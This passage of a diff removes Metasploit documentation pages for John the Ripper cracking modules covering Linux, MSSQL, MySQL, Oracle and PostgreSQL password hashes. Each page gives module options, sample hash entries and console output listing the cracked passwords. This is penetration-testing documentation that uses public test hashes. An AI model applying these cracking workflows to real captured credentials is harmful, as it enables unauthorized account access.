---- ------ ------- ------ ------- ----- ------------ ----------
|
||||
des_passphrase ????????se Password
|
||||
des_passphrase qiyh4XPJGsOZ2MEAyLkfWqeQ Nonreplayable hash des
|
||||
des_password rEK1ecacw.7.c Nonreplayable hash des
|
||||
des_password password Password
|
||||
|
||||
```
|
||||
@@ -1,176 +0,0 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Linux
|
||||
based password hashes, such as:
|
||||
|
||||
* `DES` based passwords
|
||||
* `MD5` based passwords
|
||||
* `BSDi` based passwords
|
||||
* With `crypt` set to `true`:
|
||||
* `bf`, `bcrypt`, or `blowfish` based passwords
|
||||
* `SHA256` based passwords
|
||||
* `SHA512` based passwords
|
||||
|
||||
Sources of hashes can be found here:
|
||||
[source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
|
||||
|
||||
The definition of `crypt` according to JTR and waht algorithms it decodes can be found
|
||||
[here](https://github.com/magnumripper/JohnTheRipper/blob/ae24a410baac45bb36884d793c429adeb7197336/src/c3_fmt.c#L731)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Have at least one user with an `des`, `md5`, `bsdi`, `crypt`, `blowfish`, `sha512`, or `sha256` password hash in the database
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/analyze/jtr_linux```
|
||||
4. Do: ```run```
|
||||
5. You should hopefully crack a password.
|
||||
|
||||
## Options
|
||||
|
||||
|
||||
**CONFIG**
|
||||
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
|
||||
**CRYPT**
|
||||
|
||||
Include `blowfish` and `SHA`(256/512) passwords.
|
||||
|
||||
**DeleteTempFiles**
|
||||
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
|
||||
**CUSTOM_WORDLIST**
|
||||
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
|
||||
**ITERATION_TIMEOUT**
|
||||
|
||||
The max-run-time for each iteration of cracking
|
||||
|
||||
**JOHN_PATH**
|
||||
|
||||
The absolute path to the John the Ripper executable. Default behavior is to search `path` for
|
||||
`john` and `john.exe`.
|
||||
|
||||
**KORELOGIC**
|
||||
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
|
||||
**MUTATE**
|
||||
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
|
||||
* `'@' => 'a'`
|
||||
* `'0' => 'o'`
|
||||
* `'3' => 'e'`
|
||||
* `'$' => 's'`
|
||||
* `'7' => 't'`
|
||||
* `'1' => 'l'`
|
||||
* `'5' => 's'`
|
||||
|
||||
Default is `false`.
|
||||
|
||||
**POT**
|
||||
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
|
||||
**USE_CREDS**
|
||||
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
|
||||
**USE_DB_INFO**
|
||||
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
|
||||
**USE_DEFAULT_WORDLIST**
|
||||
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
|
||||
**USE_HOSTNAMES**
|
||||
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
|
||||
**USE_ROOT_WORDS**
|
||||
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
|
||||
## Scenarios
|
||||
|
||||
Create hashes:
|
||||
|
||||
```
|
||||
creds add user:des_password hash:rEK1ecacw.7.c jtr:des
|
||||
creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
|
||||
creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi
|
||||
creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256,crypt
|
||||
creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512,crypt
|
||||
creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf
|
||||
```
|
||||
|
||||
Crack them:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/analyze/jtr_linux
|
||||
msf5 auxiliary(analyze/jtr_linux) > set crypt true
|
||||
crypt => true
|
||||
msf5 auxiliary(analyze/jtr_linux) > run
|
||||
|
||||
[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-hqwf2h
|
||||
[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-1ixz59k
|
||||
[*] Cracking md5crypt hashes in normal wordlist mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracked Passwords this run:
|
||||
[+] md5_password:password
|
||||
[*] Cracking descrypt hashes in normal wordlist mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracked Passwords this run:
|
||||
[+] des_password:password
|
||||
[*] Cracking bsdicrypt hashes in normal wordlist mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracked Passwords this run:
|
||||
[+] bsdi_password:password
|
||||
[*] Cracking crypt hashes in normal wordlist mode...
|
||||
Warning: hash encoding string length 20, type id #4
|
||||
appears to be unsupported on this system; will not load such hashes.
|
||||
Warning: hash encoding string length 60, type id $2
|
||||
appears to be unsupported on this system; will not load such hashes.
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracked Passwords this run:
|
||||
[+] des_password:password
|
||||
[+] md5_password:password
|
||||
[+] sha256_password:password
|
||||
[+] sha512_password:password
|
||||
[*] Cracking bcrypt hashes in normal wordlist mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracked Passwords this run:
|
||||
[+] blowfish_password:password
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(analyze/jtr_linux) > creds
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type JtR Format
|
||||
---- ------ ------- ------ ------- ----- ------------ ----------
|
||||
bsdi_password password Password
|
||||
des_password password Password
|
||||
sha256_password $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 Nonreplayable hash sha256,crypt
|
||||
md5_password password Password
|
||||
md5_password $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ Nonreplayable hash md5
|
||||
bsdi_password _J9..K0AyUubDrfOgO4s Nonreplayable hash bsdi
|
||||
sha512_password password Password
|
||||
blowfish_password $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe Nonreplayable hash bf
|
||||
sha512_password $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 Nonreplayable hash sha512,crypt
|
||||
sha256_password password Password
|
||||
des_password rEK1ecacw.7.c Nonreplayable hash des
|
||||
blowfish_password password Password
|
||||
|
||||
```
|
||||
@@ -1,157 +0,0 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Microsoft
|
||||
SQL based password hashes, such as:
|
||||
|
||||
* `mssql` based passwords
|
||||
* `mssql05` based passwords
|
||||
* `mssql12` based passwords
|
||||
|
||||
Sources of hashes can be found here:
|
||||
[source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Have at least one user with an `mssql`, `mssql05` or `mssql12` password in the database
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/analyze/jtr_mssql_fast```
|
||||
4. Do: ```run```
|
||||
5. You should hopefully crack a password.
|
||||
|
||||
## Options
|
||||
|
||||
|
||||
**CONFIG**
|
||||
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
|
||||
**CUSTOM_WORDLIST**
|
||||
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
|
||||
**DeleteTempFiles**
|
||||
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
|
||||
**ITERATION_TIMEOUT**
|
||||
|
||||
The max-run-time for each iteration of cracking
|
||||
|
||||
**JOHN_PATH**
|
||||
|
||||
The absolute path to the John the Ripper executable. Default behavior is to search `path` for
|
||||
`john` and `john.exe`.
|
||||
|
||||
**KORELOGIC**
|
||||
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
|
||||
**MUTATE**
|
||||
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
|
||||
* `'@' => 'a'`
|
||||
* `'0' => 'o'`
|
||||
* `'3' => 'e'`
|
||||
* `'$' => 's'`
|
||||
* `'7' => 't'`
|
||||
* `'1' => 'l'`
|
||||
* `'5' => 's'`
|
||||
|
||||
Default is `false`.
|
||||
|
||||
**POT**
|
||||
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
|
||||
**USE_CREDS**
|
||||
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
|
||||
**USE_DB_INFO**
|
||||
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
|
||||
**USE_DEFAULT_WORDLIST**
|
||||
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
|
||||
**USE_HOSTNAMES**
|
||||
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
|
||||
**USE_ROOT_WORDS**
|
||||
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
|
||||
## Scenarios
|
||||
|
||||
Create hashes:
|
||||
|
||||
```
|
||||
creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
|
||||
creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql
|
||||
creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12
|
||||
```
|
||||
|
||||
Crack them:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/analyze/jtr_mssql_fast
|
||||
msf5 auxiliary(analyze/jtr_mssql_fast) > run
|
||||
|
||||
[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-u353o8
|
||||
[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-hcwr36
|
||||
[*] Cracking mssql05 hashes in normal wordlist mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracking mssql05 hashes in single mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracking mssql05 hashes in incremental mode (Digits)...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracked Passwords this run:
|
||||
[+] mssql05_toto:toto
|
||||
[+] mssql_foo:foo
|
||||
[+] mssql05_toto:toto
|
||||
[+] mssql_foo:foo
|
||||
[*] Cracking mssql hashes in normal wordlist mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracking mssql hashes in single mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracking mssql hashes in incremental mode (Digits)...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracked Passwords this run:
|
||||
[+] mssql_foo:FOO
|
||||
[+] mssql_foo:FOO
|
||||
[*] Cracking mssql12 hashes in normal wordlist mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracking mssql12 hashes in single mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracking mssql12 hashes in incremental mode (Digits)...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracked Passwords this run:
|
||||
[+] mssql12_Password1!:Password1!
|
||||
[+] mssql12_Password1!:Password1!
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(analyze/jtr_mssql_fast) > creds
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type JtR Format
|
||||
---- ------ ------- ------ ------- ----- ------------ ----------
|
||||
mssql05_toto toto Password
|
||||
mssql05_toto 0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 Nonreplayable hash mssql05
|
||||
mssql_foo FOO Password
|
||||
mssql_foo foo Password
|
||||
mssql_foo 0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 Nonreplayable hash mssql
|
||||
mssql12_Password1! Password1! Password
|
||||
mssql12_Password1! 0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 Nonreplayable hash mssql12
|
||||
|
||||
```
|
||||
@@ -1,139 +0,0 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode MySQL
|
||||
based password hashes, such as:
|
||||
|
||||
* `mysql` (pre 4.1) based passwords
|
||||
* `mysql-sha1` based passwords
|
||||
|
||||
Sources of hashes can be found here:
|
||||
[source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Have at least one user with an `mysql`, or `mysql-sha1` password in the database
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/analyze/jtr_mysql_fast```
|
||||
4. Do: ```run```
|
||||
5. You should hopefully crack a password.
|
||||
|
||||
## Options
|
||||
|
||||
|
||||
**CONFIG**
|
||||
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
|
||||
**CUSTOM_WORDLIST**
|
||||
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
|
||||
**DeleteTempFiles**
|
||||
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
|
||||
**ITERATION_TIMEOUT**
|
||||
|
||||
The max-run-time for each iteration of cracking
|
||||
|
||||
**JOHN_PATH**
|
||||
|
||||
The absolute path to the John the Ripper executable. Default behavior is to search `path` for
|
||||
`john` and `john.exe`.
|
||||
|
||||
**KORELOGIC**
|
||||
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
|
||||
**MUTATE**
|
||||
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
|
||||
* `'@' => 'a'`
|
||||
* `'0' => 'o'`
|
||||
* `'3' => 'e'`
|
||||
* `'$' => 's'`
|
||||
* `'7' => 't'`
|
||||
* `'1' => 'l'`
|
||||
* `'5' => 's'`
|
||||
|
||||
Default is `false`.
|
||||
|
||||
**POT**
|
||||
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
|
||||
**USE_CREDS**
|
||||
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
|
||||
**USE_DB_INFO**
|
||||
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
|
||||
**USE_DEFAULT_WORDLIST**
|
||||
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
|
||||
**USE_HOSTNAMES**
|
||||
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
|
||||
**USE_ROOT_WORDS**
|
||||
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
|
||||
## Scenarios
|
||||
|
||||
Create hashes:
|
||||
|
||||
```
|
||||
creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
|
||||
creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
|
||||
```
|
||||
|
||||
Crack them:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/analyze/jtr_mysql_fast
|
||||
msf5 auxiliary(analyze/jtr_mysql_fast) > run
|
||||
|
||||
[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-o7pt47
|
||||
[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-3t366y
|
||||
[*] Cracking mysql hashes in normal wordlist mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracking mysql hashes in single mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracking mysql hashes in incremental mode (Digits)...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracked Passwords this run:
|
||||
[+] mysql_probe:probe
|
||||
[*] Cracking mysql-sha1 hashes in normal wordlist mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracking mysql-sha1 hashes in single mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracking mysql-sha1 hashes in incremental mode (Digits)...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracked Passwords this run:
|
||||
[+] mysql-sha1_tere:tere
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(analyze/jtr_mysql_fast) > creds
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type JtR Format
|
||||
---- ------ ------- ------ ------- ----- ------------ ----------
|
||||
mysql_probe probe Password
|
||||
mysql_probe 445ff82636a7ba59 Nonreplayable hash mysql
|
||||
mysql-sha1_tere tere Password
|
||||
mysql-sha1_tere *5AD8F88516BD021DD43F171E2C785C69F8E54ADB Nonreplayable hash mysql-sha1
|
||||
|
||||
```
|
||||
@@ -1,168 +0,0 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode oracle
|
||||
based password hashes, such as:
|
||||
|
||||
* `oracle` (<=10) aka `des` based passwords
|
||||
* `oracle11` based passwords
|
||||
* Oracle 11 and 12c backwards compatibility `H` field (MD5)
|
||||
* `oracle12c` based passwords
|
||||
|
||||
Sources of hashes can be found here:
|
||||
[source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
|
||||
|
||||
For a detailed explanation of Oracle 11/12c formats, see
|
||||
[www.trustwave.com](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/changes-in-oracle-database-12c-password-hashes/).
|
||||
|
||||
Oracle 11/12c `H` field is `dynamic_1506` in JtR and added
|
||||
[here](https://github.com/magnumripper/JohnTheRipper/commit/53973c5e6eb026ea232ba643f9aa20a1ffee0ffb)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Have at least one user with an `oracle`, `oracle11`, or `oracle12c` password in the database
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/analyze/jtr_oracle_fast```
|
||||
4. Do: ```run```
|
||||
5. You should hopefully crack a password.
|
||||
|
||||
## Options
|
||||
|
||||
|
||||
**CONFIG**
|
||||
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
|
||||
**CUSTOM_WORDLIST**
|
||||
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
|
||||
**DeleteTempFiles**
|
||||
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
|
||||
**ITERATION_TIMEOUT**
|
||||
|
||||
The max-run-time for each iteration of cracking
|
||||
|
||||
**JOHN_PATH**
|
||||
|
||||
The absolute path to the John the Ripper executable. Default behavior is to search `path` for
|
||||
`john` and `john.exe`.
|
||||
|
||||
**KORELOGIC**
|
||||
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
|
||||
**MUTATE**
|
||||
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
|
||||
* `'@' => 'a'`
|
||||
* `'0' => 'o'`
|
||||
* `'3' => 'e'`
|
||||
* `'$' => 's'`
|
||||
* `'7' => 't'`
|
||||
* `'1' => 'l'`
|
||||
* `'5' => 's'`
|
||||
|
||||
Default is `false`.
|
||||
|
||||
**POT**
|
||||
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
|
||||
**USE_CREDS**
|
||||
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
|
||||
**USE_DB_INFO**
|
||||
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
|
||||
**USE_DEFAULT_WORDLIST**
|
||||
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
|
||||
**USE_HOSTNAMES**
|
||||
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
|
||||
**USE_ROOT_WORDS**
|
||||
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
|
||||
## Scenarios
|
||||
|
||||
Create hashes:
|
||||
|
||||
```
|
||||
creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
|
||||
creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
|
||||
creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
|
||||
creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
|
||||
creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
|
||||
```
|
||||
|
||||
Crack them:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/analyze/jtr_oracle_fast
|
||||
msf5 auxiliary(analyze/jtr_oracle_fast) > run
|
||||
|
||||
[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-v6a8wg
|
||||
[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-123367o
|
||||
[*] Cracking oracle hashes in normal wordlist mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracking oracle hashes in single mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracked passwords this run:
|
||||
[+] simon:A
|
||||
[+] SYSTEM:THALES
|
||||
[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1skc10b
|
||||
[*] Cracking dynamic_1506 hashes in normal wordlist mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracking dynamic_1506 hashes in single mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracked passwords this run:
|
||||
[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1qwsyoy
|
||||
[*] Cracking oracle11 hashes in normal wordlist mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracking oracle11 hashes in single mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracked passwords this run:
|
||||
[+] DEMO:epsilon
|
||||
[+] oracle11_epsilon:epsilon
|
||||
[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1f9piv4
|
||||
[*] Cracking oracle12c hashes in normal wordlist mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracking oracle12c hashes in single mode...
|
||||
Using default input encoding: UTF-8
|
||||
[*] Cracked passwords this run:
|
||||
[+] oracle12c_epsilon:epsilon
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(analyze/jtr_oracle_fast) > creds
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type JtR Format
|
||||
---- ------ ------- ------ ------- ----- ------------ ----------
|
||||
simon A Password
|
||||
simon 4F8BC1809CB2AF77 Nonreplayable hash des,oracle
|
||||
SYSTEM THALES Password
|
||||
SYSTEM 9EEDFA0AD26C6D52 Nonreplayable hash des,oracle
|
||||
DEMO epsilon Password
|
||||
DEMO S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C Nonreplayable hash raw-sha1,oracle
|
||||
oracle11_epsilon epsilon Password
|
||||
oracle11_epsilon S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C Nonreplayable hash raw-sha1,oracle
|
||||
oracle12c_epsilon epsilon Password
|
||||
oracle12c_epsilon H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B Nonreplayable hash pbkdf2,oracle12c
|
||||
|
||||
```
|
||||
@@ -1,131 +0,0 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode PostgreSQL
|
||||
based password hashes, such as:
|
||||
|
||||
* `postgres` based passwords
|
||||
* `raw-md5` based passwords
|
||||
|
||||
Sources of hashes can be found here:
|
||||
[source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
|
||||
|
||||
PostgreSQL is a `raw-md5` format with the username appended to the password. This format was
|
||||
added to JtR as `dynamic_1034` [here](https://github.com/magnumripper/JohnTheRipper/commit/e57d740bed5c4f4e40a0ff346bcdde270a8173e6)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Have at least one user with an `postgres`, or `raw-md5` password in the database
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/analyze/jtr_postgres_fast```
|
||||
4. Do: ```run```
|
||||
5. You should hopefully crack a password.
|
||||
|
||||
## Options
|
||||
|
||||
|
||||
**CONFIG**
|
||||
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
|
||||
**CUSTOM_WORDLIST**
|
||||
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
|
||||
**DeleteTempFiles**
|
||||
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
|
||||
**ITERATION_TIMEOUT**
